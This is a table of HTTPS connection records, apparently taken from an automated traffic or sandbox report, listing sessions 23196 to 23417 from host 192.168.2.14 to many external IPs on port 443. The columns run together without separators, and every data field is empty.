
                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23196192.168.2.1451756119.250.45.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23197192.168.2.145450440.220.96.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23198192.168.2.1439676153.167.130.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23199192.168.2.1442440116.66.216.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23200192.168.2.143926876.20.195.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23201192.168.2.144178017.211.112.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23202192.168.2.144195696.234.195.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23203192.168.2.144177019.246.92.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23204192.168.2.1435332167.141.186.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23205192.168.2.145411825.100.121.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23206192.168.2.1449928191.184.234.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23207192.168.2.145057024.11.170.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23208192.168.2.144853018.139.62.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23209192.168.2.143833693.43.151.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23210192.168.2.145328412.195.203.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23211192.168.2.1456408184.19.172.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23212192.168.2.1448798201.203.206.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23213192.168.2.145728888.128.117.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23214192.168.2.1446568125.32.27.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23215192.168.2.145394290.86.244.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23216192.168.2.144478864.182.36.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23217192.168.2.1438336144.225.190.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23218192.168.2.145174694.31.106.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23219192.168.2.143494670.231.174.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23220192.168.2.145583825.63.135.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23221192.168.2.1457720223.231.36.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23222192.168.2.1441748202.235.187.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23223192.168.2.1455144113.52.61.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23224192.168.2.144187260.247.94.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23225192.168.2.145865413.242.105.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23226192.168.2.143503075.253.201.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23227192.168.2.14443305.245.160.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23228192.168.2.1433036199.228.227.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23229192.168.2.144384251.98.217.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23230192.168.2.1449638205.204.147.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23231192.168.2.1456482180.32.90.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23232192.168.2.1436546223.10.88.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23233192.168.2.1439374164.156.73.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23234192.168.2.145231819.157.22.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23235192.168.2.144170464.191.163.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23236192.168.2.1443622176.154.125.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23237192.168.2.1433814218.65.159.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23238192.168.2.145571238.241.3.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23239192.168.2.145861842.17.39.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23240192.168.2.1436112132.245.102.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23241192.168.2.145435083.19.166.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23242192.168.2.1458896218.126.158.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23243192.168.2.143649258.8.184.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23244192.168.2.1451784152.253.22.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23245192.168.2.143521819.94.237.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23246192.168.2.1436518121.133.115.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23247192.168.2.1436614160.255.79.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23248192.168.2.144567277.220.208.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23249192.168.2.1446440170.4.7.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23250192.168.2.145218471.202.220.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23251192.168.2.144404845.84.112.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23252192.168.2.1460460128.111.39.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23253192.168.2.1437344149.79.136.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23254192.168.2.1439156157.134.207.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23255192.168.2.145651251.68.40.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23256192.168.2.1452074150.86.62.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23257192.168.2.1434276105.226.93.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23258192.168.2.1437178194.148.223.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23259192.168.2.143823461.187.204.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23260192.168.2.1444474206.181.248.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23261192.168.2.144007270.59.177.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23262192.168.2.1439554217.2.105.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23263192.168.2.1453256181.27.96.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23264192.168.2.144586288.128.212.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23265192.168.2.1440732109.171.238.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23266192.168.2.144925812.163.13.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23267192.168.2.1441454194.154.105.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23268192.168.2.145565893.98.0.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23269192.168.2.145637437.75.168.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23270192.168.2.1449430186.44.218.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23271192.168.2.1437244166.130.247.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23272192.168.2.14524068.228.157.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23273192.168.2.144848857.37.44.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23274192.168.2.143366657.122.240.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23275192.168.2.14364782.86.32.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23276192.168.2.14517741.148.62.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23277192.168.2.1453750112.30.38.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23278192.168.2.1434702209.79.223.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23279192.168.2.1447290217.160.222.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23280192.168.2.1438746159.123.206.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23281192.168.2.1434298217.8.119.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23282192.168.2.143878691.235.46.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23283192.168.2.1458862143.28.35.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23284192.168.2.143354437.11.101.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23285192.168.2.143327863.49.187.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23286192.168.2.145138832.160.254.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23287192.168.2.1436058181.103.131.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23288192.168.2.145081062.159.222.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23289192.168.2.1445370145.234.30.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23290192.168.2.144493675.171.195.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23291192.168.2.1454726106.195.28.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23292192.168.2.14422449.127.122.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23293192.168.2.1452638199.98.140.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23294192.168.2.1441740125.59.141.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23295192.168.2.1444706197.58.27.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23296192.168.2.143332640.243.122.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23297192.168.2.144789684.153.53.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23298192.168.2.144668871.63.164.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23299192.168.2.144140438.139.37.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23300192.168.2.1441734217.106.125.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23301192.168.2.1442456100.225.41.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23302192.168.2.1437486107.33.118.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23303192.168.2.1444472197.95.139.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23304192.168.2.1437732165.8.140.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23305192.168.2.1452400222.97.220.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23306192.168.2.1459650187.47.157.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23307192.168.2.145254290.211.216.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23308192.168.2.1449250138.229.43.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23309192.168.2.1435890156.227.242.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23310192.168.2.1449948122.111.10.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23311192.168.2.1452140199.122.108.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23312192.168.2.1448942177.82.222.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23313192.168.2.1435718188.201.189.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23314192.168.2.1444614207.245.110.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23315192.168.2.1449786217.200.43.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23316192.168.2.1454156196.56.3.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23317192.168.2.14556568.17.10.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23318192.168.2.144800434.138.238.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23319192.168.2.1446200223.67.246.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23320192.168.2.1442702158.101.21.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23321192.168.2.1443350154.252.191.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23322192.168.2.1451304107.119.121.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23323192.168.2.1447596107.59.226.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23324192.168.2.144815812.141.130.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23325192.168.2.1446158222.243.151.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23326192.168.2.144633680.94.138.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23327192.168.2.144293249.195.73.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23328192.168.2.1436198180.18.102.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23329192.168.2.144786479.74.77.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23330192.168.2.1449750186.123.183.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23331192.168.2.14441504.69.116.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23332192.168.2.145083434.244.27.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23333192.168.2.1452086147.11.67.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23334192.168.2.143697292.98.172.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23335192.168.2.1449936183.162.235.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23336192.168.2.145446619.46.5.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23337192.168.2.1433564191.97.22.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23338192.168.2.145527889.170.199.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23339192.168.2.144518852.224.204.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23340192.168.2.143563265.167.61.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23341192.168.2.1459822142.47.154.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23342192.168.2.1455304203.31.225.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23343192.168.2.145850076.69.246.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23344192.168.2.144049685.241.6.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23345192.168.2.1448026184.205.240.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23346192.168.2.1442550111.16.195.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23347192.168.2.14411585.237.33.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23348192.168.2.145962614.242.124.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23349192.168.2.143343878.226.44.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23350192.168.2.143609618.145.146.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23351192.168.2.1441758158.251.237.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23352192.168.2.145680479.187.0.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23353192.168.2.1438188207.167.8.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23354192.168.2.143476088.200.54.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23355192.168.2.1436544143.237.57.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23356192.168.2.1440216211.134.95.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23357192.168.2.144613877.77.41.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23358192.168.2.145656660.32.231.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23359192.168.2.143525845.75.200.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23360192.168.2.1459332140.234.75.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23361192.168.2.1434384140.130.124.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23362192.168.2.1444382136.109.23.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23363192.168.2.1432778178.127.216.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23364192.168.2.1446260164.192.159.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23365192.168.2.143393418.144.228.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23366192.168.2.14392369.44.147.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23367192.168.2.145718225.52.46.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23368192.168.2.144525685.32.26.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23369192.168.2.144152631.175.191.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23370192.168.2.1436988110.164.68.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23371192.168.2.145300041.157.113.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23372192.168.2.1434196107.160.180.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23373192.168.2.1447718103.66.124.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23374192.168.2.1443786176.139.90.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23375192.168.2.1453620137.228.164.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23376192.168.2.1454688165.89.8.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23377192.168.2.1453092194.84.152.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23378192.168.2.1458230113.46.231.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23379192.168.2.144235867.139.172.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23380192.168.2.1447232125.165.7.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23381192.168.2.145116262.100.253.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23382192.168.2.145998075.191.126.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23383192.168.2.145442699.169.19.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23384192.168.2.1459472203.187.34.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23385192.168.2.1442414156.165.167.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23386192.168.2.1439522191.16.117.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23387192.168.2.144088693.15.253.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23388192.168.2.1432994192.174.34.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23389192.168.2.1460624221.0.126.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23390192.168.2.144526013.164.46.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23391192.168.2.143354490.39.190.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23392192.168.2.145627275.26.127.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23393192.168.2.1433810208.186.52.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23394192.168.2.143850635.18.68.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23395192.168.2.144124665.58.223.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23396192.168.2.1443552187.219.231.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23397192.168.2.1449082211.19.124.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23398192.168.2.145660669.209.13.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23399192.168.2.1449830184.226.113.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23400192.168.2.144178884.204.64.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23401192.168.2.143504240.65.212.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23402192.168.2.1452604120.65.230.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23403192.168.2.1457686196.188.47.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23404192.168.2.1434158132.116.199.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23405192.168.2.1439462135.234.49.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23406192.168.2.143461642.158.128.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23407192.168.2.145529261.138.195.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23408192.168.2.1443500134.133.177.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23409192.168.2.1455764199.152.138.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23410192.168.2.144089867.68.164.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23411192.168.2.1432982187.97.2.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23412192.168.2.1448922128.112.85.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23413192.168.2.14507481.196.148.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23414192.168.2.143632888.104.121.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23415192.168.2.144982013.216.7.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23416192.168.2.1456766165.25.114.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23417192.168.2.1433900209.30.223.114443
                                      TimestampBytes transferredDirectionData


